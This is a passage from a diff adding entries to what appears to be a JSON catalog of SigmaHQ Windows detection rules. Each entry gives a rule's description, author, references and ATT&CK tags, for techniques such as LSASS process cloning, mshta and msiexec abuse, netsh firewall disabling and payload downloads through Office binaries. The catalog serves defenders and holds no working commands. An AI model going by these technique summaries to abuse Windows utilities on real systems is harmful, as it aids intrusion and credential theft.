"Unknown" + ], + "filename": "proc_creation_win_susp_gpresult.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1615/T1615.md", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/gpresult", + "https://unit42.paloaltonetworks.com/emissary-trojan-changelog-did-operation-lotus-blossom-cause-it-to-evolve/", + "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_gpresult.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1615" + ] + }, + "uuid": "e56d3073-83ff-4021-90fe-c658e0709e72", + "value": "Gpresult Display Group Policy Information" + }, + { + "description": "Detects creation of a scheduled task with a GUID like name", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/10/31", + "falsepositive": [ + "Legitimate software naming their tasks as GUIDs" + ], + "filename": "proc_creation_win_susp_guid_task_name.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2022/10/31/follina-exploit-leads-to-domain-compromise/", + "https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_guid_task_name.yml" + ], + "tags": [ + "attack.execution", + "attack.t1053.005" + ] + }, + "uuid": "ff2fff64-4cd6-4a2b-ba7d-e28a30bbe66b", + "value": "Suspicious Scheduled Task Name As GUID" + }, + { + "description": "Detects execution of the Notepad++ updater in a suspicious directory, which is often used in DLL side-loading attacks", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/02/06", + "falsepositive": [ + "Execution of tools named GUP.exe and located in folders different than Notepad++\\updater" + ], + "filename": "proc_creation_win_susp_gup.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_gup.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1574.002" + ] + }, + "uuid": "0a4f6091-223b-41f6-8743-f322ec84930b", + "value": "Suspicious GUP Usage" + }, + { + "description": "Detects execution of the Notepad++ updater (gup) from a process other than Notepad++ to download files.", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/06/10", + "falsepositive": [ + "Other parent processes other than notepad++ using GUP that are not currently identified" + ], + "filename": "proc_creation_win_susp_gup_download.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/nas_bench/status/1535322182863179776", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_gup_download.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ] + }, + "uuid": "44143844-0631-49ab-97a0-96387d6b2d7c", + "value": "Download Files Using Notepad++ GUP Utility" + }, + { + "description": "Detects execution of the Notepad++ updater (gup) to launch other commands or executables", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/06/10", + "falsepositive": [ + "Other parent binaries using GUP not currently identified" + ], + "filename": "proc_creation_win_susp_gup_execution.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/nas_bench/status/1535322445439180803", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_gup_execution.yml" + ], + "tags": [ + "attack.execution" + ] + }, + "uuid": "d65aee4d-2292-4cea-b832-83accd6cfa43", + "value": "Execute Arbitrary Binaries Using GUP Utility" + }, + { + "description": "Use of hostname to get information", + "meta": { + "author": "frack113", + "creation_date": "2022/01/01", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_hostname.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md#atomic-test-6---hostname-discovery-windows", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/hostname", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_hostname.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1082" + ] + }, + "uuid": "7be5fb68-f9ef-476d-8b51-0256ebece19e", + "value": "Suspicious Execution of Hostname" + }, + { + "description": "Detects a suspicious IIS module registration as described in Microsoft threat report on IIS backdoors", + "meta": { + "author": "Florian Roth (rule), Microsoft (idea)", + "creation_date": "2022/08/04", + "falsepositive": [ + "Administrative activity" + ], + "filename": "proc_creation_win_susp_iis_module_registration.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_iis_module_registration.yml" + ], + "tags": "No established tags" + }, + "uuid": "043c4b8b-3a54-4780-9682-081cb6b8185c", + "value": "Suspicious IIS Module Registration" + }, + { + "description": "Checks whether the image specified in a process creation event is not a full, absolute path (caused by process ghosting or other unorthodox methods to start a process)", + "meta": { + "author": "Max Altgelt", + "creation_date": "2021/12/09", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_image_missing.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://pentestlaboratories.com/2021/12/08/process-ghosting/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_image_missing.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "71158e3f-df67-472b-930e-7d287acaa3e1", + "value": "Execution Of Non-Existing File" + }, + { + "description": "Uses the .NET InstallUtil.exe application in order to execute image without log", + "meta": { + "author": "frack113", + "creation_date": "2022/01/23", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_instalutil.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://securelist.com/moonbounce-the-dark-side-of-uefi-firmware/105468/", + "https://docs.microsoft.com/en-us/dotnet/framework/tools/installutil-exe-installer-tool", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_instalutil.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "d042284c-a296-4988-9be5-f424fadcc28c", + "value": "Suspicious Execution of InstallUtil Without Log" + }, + { + "description": "Detects a suspicious call to Invoke-WebRequest cmdlet where the and output is located in a suspicious location", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/02", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_invoke_webrequest_download.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_invoke_webrequest_download.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ] + }, + "uuid": "5e3cc4d8-3e68-43db-8656-eaaeefdec9cc", + "value": "Suspicious Invoke-WebRequest Usage" + }, + { + "description": "Detects suspicious IIS native-code module installations via command line", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/12/11", + "falsepositive": [ + "Unknown as it may vary from organisation to organisation how admins use to install IIS modules" + ], + "filename": "proc_creation_win_susp_iss_module_install.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://researchcenter.paloaltonetworks.com/2018/01/unit42-oilrig-uses-rgdoor-iis-backdoor-targets-middle-east/", + "https://www.microsoft.com/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_iss_module_install.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1505.003" + ] + }, + "uuid": "9465ddf4-f9e4-4ebd-8d98-702df3a93239", + "value": "IIS Native-Code Module Command Line Installation" + }, + { + "description": "Detects the rare use of the command line tool shutdown to logoff a user", + "meta": { + "author": "frack113", + "creation_date": "2022/10/01", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_logoff.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/9e5b12c4912c07562aec7500447b11fa3e17e254/atomics/T1529/T1529.md", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/shutdown", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_logoff.yml" + ], + "tags": [ + "attack.impact", + "attack.t1529" + ] + }, + "uuid": "ec290c06-9b6b-4338-8b6b-095c0f284f10", + "value": "Suspicious Execution of Shutdown to Log Out" + }, + { + "description": "Detects Wscript or Cscript executing from a drive other than C. This has been observed with Qakbot executing from within a mounted ISO file.", + "meta": { + "author": "Aaron Herman", + "creation_date": "2022/10/01", + "falsepositive": [ + "Legitimate applications installed on other partitions such as \"D:\"" + ], + "filename": "proc_creation_win_susp_lolbin_non_c_drive.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/pr0xylife/Qakbot/blob/main/Qakbot_BB_30.09.2022.txt", + "https://app.any.run/tasks/4985c746-601e-401a-9ccf-ae350ac2e887/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_lolbin_non_c_drive.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ] + }, + "uuid": "5b80cf53-3a46-4adc-960b-05ec19348d74", + "value": "Wscript Execution from Non C Drive" + }, + { + "description": "Detects a suspicious LSASS process process clone that could be a sign of process dumping activity", + "meta": { + "author": "Florian Roth, Samir Bousseaden", + "creation_date": "2021/11/27", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_lsass_clone.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.matteomalvica.com/blog/2019/12/02/win-defender-atp-cred-bypass/", + "https://twitter.com/Hexacorn/status/1420053502554951689", + "https://twitter.com/SBousseaden/status/1464566846594691073?s=20", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_lsass_clone.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003", + "attack.t1003.001" + ] + }, + "uuid": "c8da0dfd-4ed0-4b68-962d-13c9c884384e", + "value": "Suspicious LSASS Process Clone" + }, + { + "description": "Use of reg to get MachineGuid information", + "meta": { + "author": "frack113", + "creation_date": "2022/01/01", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_machineguid.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md#atomic-test-8---windows-machineguid-discovery", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_machineguid.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1082" + ] + }, + "uuid": "f5240972-3938-4e56-8e4b-e33893176c1f", + "value": "Suspicious Query of MachineGUID" + }, + { + "description": "Detects suspicious child processes of the Microsoft OneNote application. This may indicate an attempt to execute malicious embedded objects from a .one file.", + "meta": { + "author": "Tim Rauch (rule), Elastic (idea)", + "creation_date": "2022/10/21", + "falsepositive": [ + "File located in the AppData folder with trusted signature" + ], + "filename": "proc_creation_win_susp_microsoft_onenote_child_process.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-e34e43eb5666427602ddf488b2bf3b545bd9aae81af3e6f6c7949f9652abdf18", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_microsoft_onenote_child_process.yml" + ], + "tags": [ + "attack.t1566", + "attack.t1566.001", + "attack.initial_access" + ] + }, + "uuid": "c27515df-97a9-4162-8a60-dc0eeb51b775", + "value": "Suspicious Microsoft OneNote Child Process" + }, + { + "description": "Detects Windows command lines that miss a space before or after the /c flag when running a command using the cmd.exe.\nThis could be a sign of obfuscation of a fat finger problem (typo by the developer).\n", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/08/23", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_missing_spaces.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/cyb3rops/status/1562072617552678912", + "https://ss64.com/nt/cmd.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_missing_spaces.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "a16980c2-0c56-4de0-9a79-17971979efdd", + "value": "Missing Space Characters in Command Lines" + }, + { + "description": "Detects execution of the \"mofcomp\" utility as a child of a suspicious shell or script running utility or by having a supsicious path in the commandline.\nThe \"mofcomp\" utility parses a file containing MOF statements and adds the classes and class instances defined in the file to the WMI repository.\nAttackers abuse this utility to install malicious MOF scripts\n", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/12", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_mofcomp_execution.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/", + "https://github.com/The-DFIR-Report/Sigma-Rules/blob/75260568a7ffe61b2458ca05f6f25914efb44337/win_mofcomp_execution.yml", + "https://docs.microsoft.com/en-us/windows/win32/wmisdk/mofcomp", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_mofcomp_execution.yml" + ], + "tags": [ + "attack.execution", + "attack.t1218" + ] + }, + "uuid": "1dd05363-104e-4b4a-b963-196a534b03a1", + "value": "Suspicious Mofcomp Execution" + }, + { + "description": "Detects when when a mounted share is removed. Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation", + "meta": { + "author": "oscd.community, @redcanary, Zach Stanford @svch0st", + "creation_date": "2020/10/08", + "falsepositive": [ + "Administrators or Power users may remove their shares via cmd line" + ], + "filename": "proc_creation_win_susp_mounted_share_deletion.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.005/T1070.005.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_mounted_share_deletion.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.005" + ] + }, + "uuid": "cb7c4a03-2871-43c0-9bbb-18bbdb079896", + "value": "Mounted Share Deleted" + }, + { + "description": "Detects a certain command line flag combination used by mpiexec.exe LOLBIN from HPC pack that can be used to execute any other binary", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/01/11", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_mpiexec_lolbin.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/mrd0x/status/1465058133303246867", + "https://docs.microsoft.com/en-us/powershell/high-performance-computing/mpiexec?view=hpc19-ps", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_mpiexec_lolbin.yml" + ], + "tags": [ + "attack.execution", + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "729ce0ea-5d8f-4769-9762-e35de441586d", + "value": "MpiExec Lolbin" + }, + { + "description": "Detects suspicious execution of 'Msbuild.exe' by a uncommon parent process", + "meta": { + "author": "frack113", + "creation_date": "2022/11/17", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_msbuild.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://app.any.run/tasks/abdf586e-df0c-4d39-89a7-06bf24913401/", + "https://www.echotrail.io/insights/search/msbuild.exe", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_msbuild.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "33be4333-2c6b-44f4-ae28-102cdbde0a31", + "value": "Suspicious Msbuild Execution By Uncommon Parent Process" + }, + { + "description": "Detection for mshta.exe suspicious execution patterns sometimes involving file polyglotism", + "meta": { + "author": "Diego Perez (@darkquassar), Markus Neis, Swisscom (Improve Rule)", + "creation_date": "2019/02/22", + "falsepositive": [ + "False positives depend on scripts and administrative tools used in the monitored environment" + ], + "filename": "proc_creation_win_susp_mshta_execution.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "http://blog.sevagas.com/?Hacking-around-HTA-files", + "https://0x00sec.org/t/clientside-exploitation-in-2018-how-pentesting-has-changed/7356", + "https://docs.microsoft.com/en-us/dotnet/standard/data/xml/xslt-stylesheet-scripting-using-msxsl-script", + "https://medium.com/tsscyber/pentesting-and-hta-bypassing-powershell-constrained-language-mode-53a42856c997", + "https://twitter.com/mattifestation/status/1326228491302563846", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_mshta_execution.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1140", + "attack.t1218.005", + "attack.execution", + "attack.t1059.007", + "cve.2020.1599" + ] + }, + "uuid": "cc7abbd0-762b-41e3-8a26-57ad50d2eea3", + "value": "MSHTA Suspicious Execution 01" + }, + { + "description": "Detects suspicious mshta process patterns", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/07/17", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_mshta_pattern.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://en.wikipedia.org/wiki/HTML_Application", + "https://www.echotrail.io/insights/search/mshta.exe", + "https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_mshta_pattern.yml" + ], + "tags": [ + "attack.execution", + "attack.t1106" + ] + }, + "uuid": "e32f92d1-523e-49c3-9374-bdb13b46a3ba", + "value": "Suspicious MSHTA Process Patterns" + }, + { + "description": "Detects suspicious command line using the \"mshtml.dll\" RunHTMLApplication export to run arbitrary code via different protocol handlers (vbscript, javascript, file, htpp...)", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/14", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_susp_mshtml_runhtmlapplication.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/n1nj4sec/status/1421190238081277959", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_mshtml_runhtmlapplication.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "4782eb5a-a513-4523-a0ac-f3082b26ac5c", + "value": "Mshtml DLL RunHTMLApplication Abuse" + }, + { + "description": "Detects execution of msiexec from an uncommon directory", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/11/14", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_msiexec_cwd.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/200_okay_/status/1194765831911215104", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_msiexec_cwd.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036.005" + ] + }, + "uuid": "e22a6eb2-f8a5-44b5-8b44-a2dbd47b1144", + "value": "Suspicious MsiExec Directory" + }, + { + "description": "Detects suspicious msiexec process starts with web addresses as parameter", + "meta": { + "author": "Florian Roth", + "creation_date": "2018/02/09", + "falsepositive": [ + "False positives depend on scripts and administrative tools used in the monitored environment" + ], + "filename": "proc_creation_win_susp_msiexec_web_install.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://blog.trendmicro.com/trendlabs-security-intelligence/attack-using-windows-installer-msiexec-exe-leads-lokibot/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_msiexec_web_install.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.007", + "attack.command_and_control", + "attack.t1105" + ] + }, + "uuid": "f7b5f842-a6af-4da5-9e95-e32478f3cd2f", + "value": "MsiExec Web Install" + }, + { + "description": "Downloads payload from remote server", + "meta": { + "author": "Beyu Denis, oscd.community", + "creation_date": "2019/10/26", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_msoffice.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Powerpnt/", + "https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191", + "Reegun J (OCBC Bank)", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_msoffice.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ] + }, + "uuid": "0c79148b-118e-472b-bdb7-9b57b444cc19", + "value": "Malicious Payload Download via Office Binaries" + }, + { + "description": "Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems", + "meta": { + "author": "frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'", + "creation_date": "2021/12/07", + "falsepositive": [ + "Administrative activity" + ], + "filename": "proc_creation_win_susp_netsh_discovery_command.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1016/T1016.md#atomic-test-2---list-windows-firewall-rules", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_netsh_discovery_command.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1016" + ] + }, + "uuid": "0e4164da-94bc-450d-a7be-a4b176179f1f", + "value": "Suspicious Netsh Discovery Command" + }, + { + "description": "Detects persitence via netsh helper", + "meta": { + "author": "Victor Sergeev, oscd.community", + "creation_date": "2019/10/25", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_netsh_dll_persistence.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.007/T1546.007.md", + "https://attack.mitre.org/software/S0108/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_netsh_dll_persistence.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1546.007", + "attack.s0108" + ] + }, + "uuid": "56321594-9087-49d9-bf10-524fe8479452", + "value": "Suspicious Netsh DLL Persistence" + }, + { + "description": "Detects netsh commands that turns off the Windows firewall", + "meta": { + "author": "Fatih Sirin", + "creation_date": "2019/11/01", + "falsepositive": [ + "Legitimate administration" + ], + "filename": "proc_creation_win_susp_netsh_firewall_disable.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.winhelponline.com/blog/enable-and-disable-windows-firewall-quickly-using-command-line/", + "https://app.any.run/tasks/210244b9-0b6b-4a2c-83a3-04bd3175d017/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md#atomic-test-1---disable-microsoft-defender-firewall", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_netsh_firewall_disable.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.004", + "attack.s0108" + ] + }, + "uuid": "57c4bf16-227f-4394-8ec7-1b745ee061c3", + "value": "Firewall Disabled via Netsh" + }, + { + "description": "Detects execution of client32.exe (NetSupport RAT) from an unsual location (outisde of 'C:\\Program Files')", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/19", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_netsupport_rat_exec_location.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://redcanary.com/blog/misbehaving-rats/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_netsupport_rat_exec_location.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "37e8d358-6408-4853-82f4-98333fca7014", + "value": "Execution of NetSupport RAT From Unusual Location" + }, + { + "description": "Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems", + "meta": { + "author": "frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'", + "creation_date": "2021/12/07", + "falsepositive": [ + "Administrator, hotline ask to user" + ], + "filename": "proc_creation_win_susp_network_command.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1016/T1016.md#atomic-test-1---system-network-configuration-discovery-on-windows", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_network_command.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1016" + ] + }, + "uuid": "a29c1813-ab1f-4dde-b489-330b952e91ae", + "value": "Suspicious Network Command" + }, + { + "description": "Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.", + "meta": { + "author": "frack113", + "creation_date": "2021/12/10", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_network_listing_connections.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md#atomic-test-1---system-network-connections-discovery", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_network_listing_connections.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1049" + ] + }, + "uuid": "1c67a717-32ba-409b-a45d-0fb704a73a81", + "value": "Suspicious Listing of Network Connections" + }, + { + "description": "Detects execution of Net.exe, whether suspicious or benign.", + "meta": { + "author": "Michael Haag, Mark Woan (improvements), James Pemberton / @4A616D6573 / oscd.community (improvements)", + "creation_date": "2019/01/16", + "falsepositive": [ + "Will need to be tuned. If using Splunk, I recommend | stats count by Computer,CommandLine following the search for easy hunting by computer/CommandLine." + ], + "filename": "proc_creation_win_susp_net_execution.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/", + "https://eqllib.readthedocs.io/en/latest/analytics/4d2e7fc1-af0b-4915-89aa-03d25ba7805e.html", + "https://eqllib.readthedocs.io/en/latest/analytics/e61f557c-a9d0-4c25-ab5b-bbc46bb24deb.html", + "https://eqllib.readthedocs.io/en/latest/analytics/9b3dd402-891c-4c4d-a662-28947168ce61.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1007/T1007.md#atomic-test-2---system-service-discovery---netexe", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_net_execution.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1007", + "attack.t1049", + "attack.t1018", + "attack.t1135", + "attack.t1201", + "attack.t1069.001", + "attack.t1069.002", + "attack.t1087.001", + "attack.t1087.002", + "attack.lateral_movement", + "attack.t1021.002", + "attack.s0039" + ] + }, + "uuid": "183e7ea8-ac4b-4c23-9aec-b3dac4e401ac", + "value": "Net.exe Execution" + }, + { + "description": "Detects net use command combo which executes files from WebDAV server; seen in malicious LNK files", + "meta": { + "author": "pH-T", + "creation_date": "2022/09/01", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_net_use.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/ShadowChasing1/status/1552595370961944576", + "https://www.virustotal.com/gui/file/a63376ee1dba76361df73338928e528ca5b20171ea74c24581605366dcaa0104/behavior", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_net_use.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "f0507c0f-a3a2-40f5-acc6-7f543c334993", + "value": "Suspicious Net Use Command Combo" + }, + { + "description": "Detects a when net.exe is called with a password in the command line", + "meta": { + "author": "Tim Shelton (HAWK.IO)", + "creation_date": "2021/12/09", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_net_use_password_plaintext.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "Internal Research", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_net_use_password_plaintext.yml" + ], + "tags": "No established tags" + }, + "uuid": 